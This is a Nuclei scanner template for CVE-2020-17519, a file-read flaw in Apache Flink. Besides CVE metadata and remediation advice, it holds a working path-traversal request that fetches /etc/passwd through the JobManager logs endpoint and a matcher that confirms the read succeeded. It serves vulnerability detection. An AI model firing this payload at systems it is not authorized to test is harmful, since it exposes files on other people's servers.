nuclei-templates/http/cves/2020/CVE-2020-17519.yaml

45 lines
1.8 KiB
YAML

id: CVE-2020-17519
info:
name: Apache Flink - Local File Inclusion
author: pdteam
severity: high
description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
remediation: |
Apply the latest security patches or upgrade to a patched version of Apache Flink to mitigate the vulnerability.
reference:
- https://github.com/B1anda0/CVE-2020-17519
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-17519
cwe-id: CWE-552
epss-score: 0.9717
epss-percentile: 0.99762
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: flink
tags: cve,cve2020,apache,lfi,flink
http:
- method: GET
path:
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100812a182f9e264266562b66fadd65d8abf60d24cea912d6b229ee432fe653a461022058d1d4b877abafdba6c1dbd0073d2961d1e8b45815933ad5faab8931c822cac3:922c64590222798bb761d5b6d8e72950